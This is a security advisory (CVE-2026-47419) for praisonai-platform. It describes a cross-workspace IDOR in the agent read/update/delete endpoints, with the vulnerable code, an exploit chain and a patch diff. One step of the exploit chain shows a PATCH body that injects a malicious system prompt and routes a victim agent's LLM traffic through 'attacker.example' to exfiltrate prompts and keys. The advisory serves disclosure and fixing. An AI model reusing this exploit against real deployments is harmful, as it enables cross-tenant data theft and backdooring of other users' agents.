CVE-2026-47419
praisonai-platform: Agent endpoints accept any agent_id without workspace ownership check, cross-workspace read/update/delete IDOR
Description
## Summary **Type:** Insecure Direct Object Reference. The agent CRUD endpoints (`GET / PATCH / DELETE /workspaces/{workspace_id}/agents/{agent_id}`) gate access on `require_workspace_member(workspace_id)` only, then resolve `agent_id` through `AgentService.get(agent_id)` which is a primary-key lookup with no workspace constraint. A user who is a member of any workspace `W1` can read, modify, or delete agents that belong to a different workspace `W2` by guessing or harvesting an agent UUID and calling `…/workspaces/W1/agents/<W2-agent-id>`. **File:** `src/praisonai-platform/praisonai_platform/services/agent_service.py`, lines 53-112; route handlers at `src/praisonai-platform/praisonai_platform/api/routes/agents.py`, lines 53-100. **Root cause:** the route extracts `workspace_id` from the URL path and passes it to `require_workspace_member` for the membership check, but never threads it through to the service layer. `AgentService.get` calls `session.get(Agent, agent_id)`, which is `SELECT * FROM agents WHERE id = :agent_id` with no `AND workspace_id = :workspace_id`. `update` and `delete` call `self.get(agent_id)` first and then mutate the returned row, inheriting the same gap. The `MemberService` is the one place in this codebase that does this correctly: it uses `(workspace_id, user_id)` as a composite key. The agent service simply forgot the second predicate, which is the textbook GHSA pattern for FastAPI services that treat routing parameters as decorative rather than authoritative. ## Affected Code **File 1:** `src/praisonai-platform/praisonai_platform/services/agent_service.py`, lines 53-55 and 105-112. ```python class AgentService: ... async def get(self, agent_id: str) -> Optional[Agent]: """Get agent by ID.""" return await self._session.get(Agent, agent_id) # <-- BUG: no workspace_id predicate async def update( self, agent_id: str, name: Optional[str] = None, ... ) -> Optional[Agent]: agent = await self.get(agent_id) # <-- inherits the same gap if agent is None: return None ... return agent async def delete(self, agent_id: str) -> bool: agent = await self.get(agent_id) # <-- inherits the same gap if agent is None: return False await self._session.delete(agent) await self._session.flush() return True ``` **File 2:** `src/praisonai-platform/praisonai_platform/api/routes/agents.py`, lines 53-101. ```python @router.get("/{agent_id}", response_model=AgentResponse) async def get_agent( workspace_id: str, agent_id: str, user: AuthIdentity = Depends(require_workspace_member), # only checks membership in workspace_id session: AsyncSession = Depends(get_db), ): svc = AgentService(session) agent = await svc.get(agent_id) # <-- workspace_id never passed; svc.get returns any agent in the DB if agent is None: raise HTTPException(status_code=404, detail="Agent not found") return AgentResponse.model_validate(agent) ``` The `update_agent` (lines 67-87) and `delete_agent` (lines 90-100) handlers exhibit the same pattern: they receive `workspace_id` via path parameter, use it solely for the membership gate, then call `svc.update(agent_id, ...)` / `svc.delete(agent_id)` without re-checking which workspace the agent actually belongs to. **Why it's wrong:** the `workspace_id` segment in the route is treated as a UI hint (it gates "are you in some workspace W?") rather than an authoritative predicate (it should also gate "is the resource you are addressing actually inside W?"). A standard fix in FastAPI/SQLAlchemy services is to make the resource-lookup query include the workspace predicate and treat absence as 404, so that a foreign-workspace agent is indistinguishable from a non-existent one. The codebase already does this correctly in `MemberService.get(workspace_id, user_id)` and in `*.list_for_workspace(workspace_id, ...)` — the gap is specific to the single-row `get` / `update` / `delete` paths. ## Exploit Chain 1. Attacker registers two accounts (or recruits a single workspace member) and creates two workspaces: `W_attacker` (attacker is a member) and obtains a known `agent_id` from `W_target` (a workspace the attacker is NOT a member of). Agent IDs are uuid4 strings (DB column default), but they leak through several side channels: user-list endpoints when an agent is mentioned in an issue body, the activity feed (`activity.py:log` records `entity_id=agent.id`), webhook payloads, error messages, exported issue dumps, or simply by enumeration if the deployment does not rotate IDs frequently. State: attacker holds a target agent UUID `A_T`. 2. Attacker authenticates and POSTs `Authorization: Bearer <attacker_jwt>` to `GET /workspaces/W_attacker/agents/A_T`. `require_workspace_member(W_attacker, attacker)` returns the attacker's identity (they are a member of `W_attacker`). State: control flow enters `get_agent` with `workspace_id=W_attacker`, `agent_id=A_T`. 3. `AgentService.get(A_T)` runs `session.get(Agent, "A_T")`, which is `SELECT * FROM agents WHERE id = 'A_T' LIMIT 1`. The query has no `workspace_id = 'W_attacker'` filter and returns the row — including its `instructions`, `runtime_config`, `name`, `status`, `owner_id`, etc — even though `agent.workspace_id == 'W_target'`. State: response body is the JSON-serialised target agent. 4. Attacker repeats with `PATCH /workspaces/W_attacker/agents/A_T` and a body of `{"instructions": "<malicious system prompt>", "runtime_mode": "cloud", "runtime_config": {"api_base": "https://attacker.example/v1", "api_key": "<exfil>"}}`. `update_agent` calls `svc.update(A_T, ...)` which loads the target row and mutates the listed fields. State: the foreign workspace's agent now has attacker-chosen instructions and routes its LLM traffic through `attacker.example`. 5. Attacker calls `DELETE /workspaces/W_attacker/agents/A_T` to wipe the target agent altogether, or repeats step 4 against every agent UUID they can harvest. State: target workspace's agent fleet is destroyed or backdoored. ## Security Impact **Severity:** sec-high. CVSS 8.1: network attack, low complexity, low privileges (any authenticated workspace member), no user interaction, scope unchanged (the auth context is the same component), high confidentiality (full agent record including instructions and runtime config), high integrity (arbitrary writes), low availability (DELETE wipes target agents). **Attacker capability:** with one workspace-member token plus a harvested or guessed agent UUID, an attacker can read the target agent's `instructions` (often a proprietary system prompt), `runtime_config` (frequently contains LLM provider URLs and API keys when the deployment uses BYOK), `owner_id`, and status; rewrite the same fields to redirect the agent's LLM traffic to an attacker-controlled endpoint (proxy-and-log of every prompt, prompt injection of every response); flip `status` to `error` to silently break a competitor workspace's agent fleet; or delete the agents outright. **Preconditions:** `praisonai-platform` is deployed multi-tenant (more than one workspace exists); the attacker has any membership token; the target agent's UUID is known or guessable (uuid4 randomness is large but UUIDs leak through activity feeds, webhook payloads, issue mentions, error messages, and operator screenshots). **Differential:** source-inspection-verified end-to-end. The asymmetry between `AgentService.get(agent_id)` (no workspace check) and `MemberService.get(workspace_id, user_id)` (composite key check) is the smoking gun: the same author wrote both patterns, but only the member service is tenant-safe. With the suggested fix below applied, `AgentService.get(workspace_id, agent_id)` returns `None` when the agent belongs to a different workspace, the route handler returns 404, and the foreign workspace's data is indistinguishable from a missing record. ## Suggested Fix Make every single-row resource lookup take the workspace predicate. Treat foreign-workspace rows as 404, not 200, so the endpoint does not even confirm that the target ID exists. ```diff --- a/src/praisonai-platform/praisonai_platform/services/agent_service.py +++ b/src/praisonai-platform/praisonai_platform/services/agent_service.py @@ -50,9 +50,12 @@ class AgentService: await self._session.flush() return agent - async def get(self, agent_id: str) -> Optional[Agent]: - """Get agent by ID.""" - return await self._session.get(Agent, agent_id) + async def get(self, workspace_id: str, agent_id: str) -> Optional[Agent]: + """Get agent by ID, scoped to a workspace.""" + stmt = select(Agent).where( + Agent.id == agent_id, Agent.workspace_id == workspace_id + ) + return (await self._session.execute(stmt)).scalar_one_or_none() async def list_for_workspace( self, @@ -71,6 +74,7 @@ class AgentService: async def update( self, + workspace_id: str, agent_id: str, name: Optional[str] = None, ... ) -> Optional[Agent]: - agent = await self.get(agent_id) + agent = await self.get(workspace_id, agent_id) if agent is None: return None ... - async def delete(self, agent_id: str) -> bool: + async def delete(self, workspace_id: str, agent_id: str) -> bool: - agent = await self.get(agent_id) + agent = await self.get(workspace_id, agent_id) if agent is None: return False ``` The route handlers in `routes/agents.py` then need to pass `workspace_id` into every `svc.get/update/delete` call. Repeat the pattern for `IssueService`, `ProjectService`, `CommentService`, and `LabelService`, which exhibit the same single-key lookup; those should be filed and fixed as separate advisories so each gets its own CVE.